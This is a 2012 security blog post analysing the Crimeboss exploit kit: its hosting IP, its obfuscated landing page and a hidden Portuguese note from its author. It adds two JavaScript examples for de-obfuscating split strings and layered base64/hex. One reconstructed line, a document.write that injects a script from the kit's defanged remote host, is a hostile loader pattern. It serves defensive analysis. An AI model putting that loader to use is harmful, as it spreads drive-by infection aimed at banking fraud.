A Quick Look at the Crimeboss Exploit Kit

November 26, 2012 - By Chris Larsen | Co-Authors Nate Clark and Jacob Siebach

[Nate and Jacob are analysts on the WebPulse team. A week or so ago, they did some poking around a site running the Crimeboss exploit kit, and I thought their findings were worth sharing. --C.L.]


An exploit kit known as "Crimeboss" has been in the news for a couple of months. There's a good write-up about the Java exploits it serves here. [My favorite part is that it will actually prompt you to install Java if you don't have it, so that it can then infect you.]

The sample we played with is hosted at 61.19.251.27, a server located in Thailand. The landing page is the aptly-named cb.php. From there, a page is generated with the following obfuscation:

"'<sc' + 'ri' + 'pt src=hxxp://aidgo.com.br/cbx/index.php?setup=d&s=2&r=' + a randomly generated number" followed by more concatenated fragments and a closing script tag that is split up the same way. Splitting "<script" across several string literals means the tag only exists once the browser has joined the pieces, so a scanner that looks for the literal string never sees it.
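The folding trick works in both directions: the same concatenation that hides the tag from a naive scanner can be undone statically. The following is an added example (not the kit's code and not from the original post) that joins split string literals back together without executing anything, so the injected src and its host show up in the folded result. The snippet it runs on is reconstructed from the fragment quoted above; the random-number expression and the closing '></sc' + 'ri' + 'pt>' part are assumptions, since the post only paraphrases them, and the hxxp:// defanging is kept as the post writes it.

```javascript
// Static folding of split string literals such as '<sc' + 'ri' + 'pt ...'
// so the injected <script src=...> becomes visible without running the page.
// Added example, not the kit's own code. OBFUSCATED is reconstructed from the
// fragment quoted in the post; the Math.random() expression and the closing
// '></sc' + 'ri' + 'pt>' part are ASSUMED (the post only paraphrases them).
const OBFUSCATED =
  "document.write('<sc' + 'ri' + 'pt src=hxxp://aidgo.com.br/cbx/index.php?setup=d&s=2&r=' +" +
  " Math.floor(Math.random() * 1000000) + '></sc' + 'ri' + 'pt>');";

// Split source into string-literal tokens and the code between them.
// Escapes are handled only enough to keep a literal's quote from closing it early.
function tokenize(src) {
  const tokens = [];
  let code = "";
  let i = 0;
  while (i < src.length) {
    const q = src[i];
    if (q === "'" || q === '"') {
      if (code) { tokens.push({ type: "code", value: code }); code = ""; }
      let j = i + 1;
      let val = "";
      while (j < src.length && src[j] !== q) {
        if (src[j] === "\\" && j + 1 < src.length) { val += src[j + 1]; j += 2; continue; }
        val += src[j];
        j++;
      }
      tokens.push({ type: "str", value: val });
      i = j + 1;
    } else {
      code += q;
      i++;
    }
  }
  if (code) tokens.push({ type: "code", value: code });
  return tokens;
}

// Join runs of literals connected by '+'. A non-literal operand inside a run
// (the random number here) is kept as a {{...}} placeholder so the rest of
// the string still lines up.
function foldConcatenations(src) {
  const tokens = tokenize(src);
  const folded = [];
  let cur = null;
  for (let k = 0; k < tokens.length; k++) {
    const t = tokens[k];
    if (t.type === "str") {
      cur = cur === null ? t.value : cur + t.value;
      continue;
    }
    const glue = t.value.trim();
    const next = tokens[k + 1];
    const joins = cur !== null && next !== undefined && next.type === "str" &&
      glue.length >= 1 && glue.startsWith("+") && glue.endsWith("+");
    if (joins) {
      const inner = glue.slice(1, -1).replace(/\s+/g, "");
      if (inner) cur += "{{" + inner + "}}";
    } else {
      if (cur !== null) folded.push(cur);
      cur = null;
    }
  }
  if (cur !== null) folded.push(cur);
  return folded;
}

// Scan the folded strings for script tags and pull out the src and its host.
function findInjectedScripts(src) {
  const hits = [];
  for (const s of foldConcatenations(src)) {
    const re = /<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
    let m;
    while ((m = re.exec(s)) !== null) {
      const url = m[1];
      const host = /^[a-z]+:\/\/([^\/?#]+)/i.exec(url);
      hits.push({ src: url, host: host ? host[1].toLowerCase() : null });
    }
  }
  return hits;
}

console.log(foldConcatenations(OBFUSCATED));
console.log(findInjectedScripts(OBFUSCATED));
```

The folded string reads `<script src=hxxp://aidgo.com.br/cbx/index.php?setup=d&s=2&r={{Math.floor(Math.random()*1000000)}}></script>`, which is enough to block the host in a web proxy or to feed the URL to a crawler. The folder is deliberately dumb: it does not evaluate anything, so `eval`, `unescape` or `String.fromCharCode` layers on top of the concatenation would need a further pass.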


Following that script URL, we hit the exploit, which hits you with nasty bits served from several different pages. Crimeboss focuses mainly on banking fraud, mostly in Brazil, where it likes to use hacked .com.br sites in its attacks.

Interestingly enough, included at the bottom of the page is a base64-encoded string. Decode that and you get a string of hex; decode THAT and you get a message in Portuguese which, translated into English, gives a peek into the culprit's mind:

“Greetings to my fellow workers at the crimesciberneticos.com blog.
Knowing that we know nothing beyond good and evil, after all the only thing absolute is that everything is relative.
A hug, your friend Psychlo.
by Psychlo”

Crimesciberneticos.com is a security blog, so apparently "Psychlo" is assuming they'll be looking at his code at some point, and has left them a friendly note...
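The two-stage decode described above (base64 on the outside, hex underneath, text at the core), as an added example that is not code from the post or from the kit. The blob it runs on is constructed for this example by layering a placeholder message the same way; it is not the real string from the Crimeboss page. One caveat the code handles: every hex string is also made of base64 alphabet characters, so hex has to be tested first, and a decoded layer is only accepted if it is still valid text, which keeps the loop from "decoding" real text that merely looks like hex.

```javascript
// Peel the layered encoding found at the bottom of the Crimeboss page:
// base64 on the outside, hex underneath, readable text at the core.
// Added example, not code from the post or the kit. SAMPLE_BLOB is
// CONSTRUCTED here by encoding a placeholder the same way; it is not the
// real string from the kit's page.
const HEX_RE = /^(?:[0-9a-fA-F]{2})+$/;
const B64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

// Return the buffer as text if it is valid UTF-8 with no control bytes,
// otherwise null. This is what stops the loop from "decoding" real text
// that merely happens to look like hex or base64.
function asText(buf) {
  let text;
  try {
    text = new TextDecoder("utf-8", { fatal: true }).decode(buf);
  } catch {
    return null;
  }
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (cp < 0x20 && ch !== "\n" && ch !== "\r" && ch !== "\t") return null;
  }
  return text;
}

// Repeatedly strip one encoding layer until what is left is neither hex
// nor base64. Hex is tested first: every hex string is also made of base64
// alphabet characters, so the stricter check has to win.
function peelLayers(blob, maxLayers = 8) {
  const layers = [];
  let cur = blob.trim();
  for (let i = 0; i < maxLayers; i++) {
    const compact = cur.replace(/\s+/g, ""); // tolerate line-wrapped blobs
    let kind;
    let decoded;
    if (HEX_RE.test(compact)) {
      kind = "hex";
      decoded = Buffer.from(compact, "hex");
    } else if (B64_RE.test(compact) && compact.length % 4 === 0) {
      kind = "base64";
      decoded = Buffer.from(compact, "base64");
    } else {
      break;
    }
    const text = asText(decoded);
    if (text === null) break; // decoded to binary junk: not a real layer
    layers.push({ kind, text });
    cur = text.trim();
  }
  return { final: cur, layers };
}

// Build a blob layered the same way as the kit's note (text -> hex -> base64).
function layerEncode(plaintext) {
  const hex = Buffer.from(plaintext, "utf8").toString("hex");
  return Buffer.from(hex, "utf8").toString("base64");
}

// Constructed placeholder; the real Portuguese note is not reproduced here.
const SAMPLE_PLAINTEXT = "constructed sample note, not the kit's real message";
const SAMPLE_BLOB = layerEncode(SAMPLE_PLAINTEXT);

console.log(SAMPLE_BLOB);
console.log(peelLayers(SAMPLE_BLOB));
```

`peelLayers` returns both the final text and the list of layers it removed, so an analyst can see the order of encodings (here base64 then hex) rather than just the result. The validity check is a heuristic: a short hex string can by chance decode to valid UTF-8, so for anything that matters the layers should be eyeballed.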

We're keeping an eye out for more Crimeboss sites.

--N.C. and J.S.


[After several minutes of searching, I wasn't able to find anyone who's blogged about the note from Psychlo in Crimeboss pages, so I thought this deserves a wider audience... --C.L.]